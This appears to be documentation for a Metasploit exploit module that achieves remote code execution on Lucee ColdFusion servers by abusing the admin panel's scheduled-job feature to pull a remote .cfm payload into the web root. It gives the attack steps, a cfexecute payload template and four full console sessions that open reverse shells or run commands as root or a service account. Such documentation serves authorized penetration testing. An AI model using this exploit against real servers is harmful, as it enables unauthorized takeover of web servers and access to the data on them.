# Vulnerable Application
Lucee is an Open Source ColdFusion server/engine intended for rapid web development. Many implementations of
ColdFusion files support dynamic input and server side code execution.
In the case of this module, Lucees implementation supports the use of `cfexecute` and `cfscript` tags in `.cfm` files.

In addition to these features, Lucee provides a scheduled job feature. This feature will accept an
external `url` argument and query that page on execution. If logging is enabled, it is possible to
query a remote ColdFusion document, log it in the web root, and access it to execute its code,
subsequently achieving arbitrary server side code execution. The payload will run as the user 
specified during the Lucee installation. On Windows, this is a service account; on Linux, 
it is either the root user or lucee.

The series of requests to achieve this is as follows.

1. Authenticate as the administrator to the web admin panel
2. Create a scheduled job that includes a URL to the remote ColdFusion document
3. Update the scheduled job to turn on logging and ensure that the remote document is logged to the web root
4. Execute the scheduled job. The Lucee server will now reach out to and download the ColdFusion document from the attackers server
5. Access the document at the web root of the server, thus executing the payload.

The basic format for the remote ColdFusion document is as follows.
```html
<cfscript>
            cfexecute(name="powershell.exe", arguments="-c whoami",timeout=5);
</cfscript>
```

The scheduled job feature of Lucee is available in all versions currently available through the vendors website,
available [here](https://download.lucee.org/).As this is default functionality that does not require
any additional setup/configuration, the application is vulnerable immediately upon setup.

## Verification Steps

1. Download and install Lucee from the vendors website. This can be done on either a Windows or Unix host.
   No additional setup is needed beyond the initial installation walkthrough
2. Start MSF Console
3. Do: `use multi/http/lucee_scheduled_job`
4. Choose a target that reflects the target system
	- `use X` (0 for Windows, 1 for Linux)
5. Select payload. This functions with command execution payloads and supports reverse shells and generic commands.
6. Select the desired payload and complete its requirement. `CMD`, `LHOST`, `LPORT`, etc.
7. Select the appropriate `RHOST`, `PASSWORD`, and (if necessary), the `TARGETURI`
8. Execute the payload. You should either receive a shell or see the output of your command.

## Options

### RHOSTS

Remote host to target.

### RPORT

Port being used by the Lucee admin panel. Default is 8888

### PASSWORD

The password of the administrative user. Lucee does not use a username, only a password to access the admin panel.

### TARGETURI

Target URI of the Lucee administrator panel. Default is

`/lucee/admin/web.cfm/`


### PAYLOAD_DEPLOY_TIMEOUT

Periodically, the target web server may take a moment to download and make the payload accessible. This
parameter determines how long the exploit should wait until considering the payload inaccessible.


## Scenarios
### Successful exploitation of a Windows 10 host running Lucee 5.3.10.120 for a service account shell
```
msf6 > use exploit/multi/http/lucee_scheduled_job 
[*] Using configured payload cmd/windows/generic
msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 10.0.0.164
RHOSTS => 10.0.0.164
msf6 exploit(multi/http/lucee_scheduled_job) > set LHOST 10.0.0.45
LHOST => 10.0.0.45
msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
PASSWORD => admin123
msf6 exploit(multi/http/lucee_scheduled_job) > run

[*] Started reverse TCP handler on 192.168.19.145:4444 
[+] Authenticated successfully
[*] Using URL: http://192.168.19.145:8081/W7hSRT7xJLjosBr.cfm
[+] Job W7hSRT7xJLjosBr created successfully
[+] Job W7hSRT7xJLjosBr updated successfully
[*] Executing scheduled job: W7hSRT7xJLjosBr
[+] Job W7hSRT7xJLjosBr executed successfully
[*] Attempting to access payload...
[*] Payload request received for /W7hSRT7xJLjosBr.cfm?RequestTimeout=50 from 192.168.19.131
[*] Attempting to access payload...
[*] Powershell session session 1 opened (192.168.19.145:4444 -> 192.168.19.131:53204) at 2023-02-28 19:52:46 -0600
[*] Received 500 response from W7hSRT7xJLjosBr.cfm
[+] Exploit completed.
[*] Removing scheduled job W7hSRT7xJLjosBr
[+] Scheduled job removed.
[*] Server stopped.
[!] This exploit may require manual cleanup of 'C:\lucee\tomcat\webapps\ROOT\W7hSRT7xJLjosBr.cfm' on the target


Shell Banner:
Windows PowerShell running as user LOCAL SERVICE on HOMELAB-BINCE
Copyright (C) Microsoft Corporation. All rights reserved.
-----
          
PS C:\lucee\tomcat> 
```
### Successful exploitation of a Windows 10 host running Lucee 5.3.10.120 executing whoami
```
msf6 > use exploit/multi/http/lucee_scheduled_job 
[*] Using configured payload cmd/windows/generic
msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
PASSWORD => admin123
msf6 exploit(multi/http/lucee_scheduled_job) > set CMD whoami
CMD => whoami
msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 10.0.0.164
RHOSTS => 10.0.0.164
msf6 exploit(multi/http/lucee_scheduled_job) > run

[+] Authenticated successfully
[*] Using URL: http://192.168.19.145:8081/UHn0jvUP2ZDtgwN.cfm
[+] Job UHn0jvUP2ZDtgwN created successfully
[+] Job UHn0jvUP2ZDtgwN updated successfully
[*] Executing scheduled job: UHn0jvUP2ZDtgwN
[+] Job UHn0jvUP2ZDtgwN executed successfully
[*] Attempting to access payload...
[*] Payload request received for /UHn0jvUP2ZDtgwN.cfm?RequestTimeout=50 from 192.168.19.131
[*] Attempting to access payload...
[+] Received 200 response from UHn0jvUP2ZDtgwN.cfm
[+] Output: nt authority\local service
[+] Exploit completed.
[*] Removing scheduled job UHn0jvUP2ZDtgwN
[+] Scheduled job removed.
[*] Server stopped.
[!] This exploit may require manual cleanup of 'C:\lucee\tomcat\webapps\ROOT\UHn0jvUP2ZDtgwN.cfm' on the target
[*] Exploit completed, but no session was created.
```

### Successful exploitation of a Docker host running Lucee 5.1.4.19 for a shell as Lucee
```
msf6 > use exploit/multi/http/lucee_scheduled_job 
[*] Using configured payload cmd/windows/generic
msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
PASSWORD => admin123
msf6 exploit(multi/http/lucee_scheduled_job) > set target 1
target => 1
msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/lucee_scheduled_job) > set LHOSTS 10.0.0.45
LHOST => 10.0.0.45
msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 10.0.0.33
RHOSTS => 10.0.0.33
msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
PASSWORD => admin123
msf6 exploit(multi/http/lucee_scheduled_job) > run

[*] Started reverse TCP handler on 192.168.19.145:4444 
[+] Authenticated successfully
[*] Using URL: http://192.168.19.145:8081/CUyWHyD6Y.cfm
[+] Job CUyWHyD6Y created successfully
[+] Job CUyWHyD6Y updated successfully
[*] Executing scheduled job: CUyWHyD6Y
[+] Job CUyWHyD6Y executed successfully
[*] Attempting to access payload...
[*] Payload request received for /CUyWHyD6Y.cfm?RequestTimeout=50 from 192.168.19.145
[*] Attempting to access payload...
[*] Received 500 response from CUyWHyD6Y.cfm Check your listener!
[+] Exploit completed.
[*] Removing scheduled job CUyWHyD6Y
[+] Scheduled job removed.
[+] Deleted /srv/www/app/webroot/CUyWHyD6Y.cfm
[*] Command shell session 1 opened (192.168.19.145:4444 -> 192.168.19.145:58686) at 2023-02-28 19:56:11 -0600
[*] Server stopped.

whoami
root
```
### Successful exploitation of a Docker host running Lucee 5.1.4.19 executing whoami
```
msf6 > use exploit/multi/http/lucee_scheduled_job 
[*] Using configured payload cmd/windows/generic
msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
PASSWORD => admin123
msf6 exploit(multi/http/lucee_scheduled_job) > set target 1
target => 1
msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf6 exploit(multi/http/lucee_scheduled_job) > set CMD whoami
CMD => whoami
msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
PASSWORD => admin123
msf6 exploit(multi/http/lucee_scheduled_job) > run

[+] Authenticated successfully
[*] Using URL: http://192.168.19.145:8081/GCHSFzGe.cfm
[+] Job GCHSFzGe created successfully
[+] Job GCHSFzGe updated successfully
[*] Executing scheduled job: GCHSFzGe
[+] Job GCHSFzGe executed successfully
[*] Attempting to access payload...
[*] Payload request received for /GCHSFzGe.cfm?RequestTimeout=50 from 192.168.19.145
[+] Received 200 response from GCHSFzGe.cfm
[+] Output: root
[+] Exploit completed.
[*] Removing scheduled job GCHSFzGe
[+] Scheduled job removed.
[*] Server stopped.
[!] This exploit may require manual cleanup of '/srv/www/app/webroot/GCHSFzGe.cfm' on the target
[*] Exploit completed, but no session was created.
```
## Caveats
There are a few caveats worth mentioning that are inherent to Lucee's implementation of ColdFusion
 - When a shell command returns multiple lines of output, coldfusion may limit the amount that is returned; i.e. it
   will return the full value of an `ls` command, but it may not return the full value of `netstat`
